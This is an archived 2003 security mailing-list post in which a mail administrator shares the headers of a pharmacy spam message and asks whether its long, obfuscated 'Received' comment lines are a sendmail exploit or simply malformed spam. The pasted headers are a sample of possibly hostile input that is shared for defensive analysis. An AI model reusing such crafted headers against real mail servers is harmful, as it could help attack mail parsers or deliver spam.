sendmail exploit or ill formatted spam

From: Dominik Samuelis (checkpoint-fw1at_private-darmstadt.de)
Date: Mon Mar 10 2003 - 13:49:11 PST


    Hi,
    
    Today I had some messages with the following headers on one of my mail
    servers. Ill-formatted spam or sendmail exploit in the wild?
    
    --
    Dominik Samuelis
    
    
    
    ----------- message1----------
    From shopdirect@snail-mail.net  Mon Mar 10 14:15:50 2003
    X-UIDL: 1*m!!l*H"!_p8!!a0/!!
    Return-Path: <shopdirect@snail-mail.net>
    Received: from sm21.localdomain ([206.40.229.121])
            by smtpsrv.campanova.net (8.12.8/8.12.8) with ESMTP id
    h2ADFYhY013371
            for <xxxat_private>; Mon, 10 Mar 2003 14:15:45 +0100
    Received: from unknown
    Date: Mon, 10 Mar 2003 06:15:06 -0700 (MST)
    Message-Id: <200303101315.h2ADF6l0026203at_private>
    Comments: Received: from Pb>;7F=o2@=]4@>|>6:36=EDoDDD?6E]4@>Nz B
              Received: from Jx3FEE6C7=J:?5o;F?@]4@>|36?oAF3=:D:E6]36|?2?4J]>:49
    @?o?2D9G:==6]4@>|>:?6CG2o>:?6CG2:?4]4@>|:?G@:4:?8
    oK:Aa]4@>|25=6Co>24BF2C:F>]4@>Tx M
              Received: from Ma;@9?oC6?@]BF:<]4@>|>:4<=6o>2:=]4@>>@?=:?<]4@>|563
    3:6o?6E\C6D@FC46]4@>|7C2?4:Do>2:=]>:?8A2@]4@>|72F
    D6Jo49:=<2ED@7E]4@>|52G6]42C=D@?o?6EH@C<D4@>]4@>Tv T
              Received: from Tu5>442CE9JoA3]?6E|>C\>CDo86@4:E:6D]4@>|8?oD5G]7C|>
    @>@?6Jo>@>@?6J]4@>|9@DE>2DE6Co6?E@C?@]6D|;:>>FCA9
    J`o2@=]4@>Tq R
              Received: from Ac49C:Do3=@>36C8]?6E|C2=3@?oD5:4]?6E|>E?35Jo2==H6DE
    ]?6E|D49>:5Eo42>A2?@G2]56|9@DE>2DE6Co>:5H6DE:D]?6
    E|>6>46?E6Co>6>AC@]H:?]?6ETz G
              Received: from RmG6?F496<o6C@=D]4@>|3D49J>FC2o@C:8:?6E]4@>]3C|2=6I
    oA:=2EFD56D:8?D]4@>|DF?D:?oAF3]K9@?8D92?]85]4?|6>
    6?56=o36DE]4@>|<66A6Co4J3CK?]4@>Mr Z
              Received: from Nr432=E2K2Co8@7:=?6E]4@>|82==A6E6Co4@>AFD6CG6]4@>|5
    FDE32<oIDc2==]?=|G;3o?6E=23D]?6E|>A56D:8?o36DE]4@
    >|C@@EoD6:?6E]:ETT T
              Received: from Nz>@I?I`o62CE9=:?<]?6E|;482=G6Ko9@=@?6E]?6E|392==oD
    J?6C8J:?E]4@>|E=>45@H6==oJ29@@]4@>|`_d_ba]adceo4@
    >AFD6CG6]4@>|5>2EE96HDo>AD4@>A2?J]4@>Rb Y
              Received: from PQ>G2=G2?@o82C=@4<\:?4]4@>|4DDoE2C86E]?6E|@=:D2EK86
    Co2@=]4@>|2CG:?50DFE92Co3:87@@E]4@>|C6D:DEC2CoE96
    C@4<:6D]4@>|;@6oD2G2C5]?6ERz M
    Errors: shopdirect@snail-mail.net
    From: Free Overnight Shipping <shopdirect@snail-mail.net>
    To: No Prescription Needed <moreland6512at_private>
    Subject: Online Pharmacy Free Shipping
    MIME-Version: 1.0
    Content-Type: text/html; charset=us-ascii
    Content-Transfer-Encoding: 7bit
    Status: RO
    
    
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN
    [... normal spam body follows...]
    
    
    
    



    This archive was generated by hypermail 2b30 : Tue Mar 11 2003 - 09:17:27 PST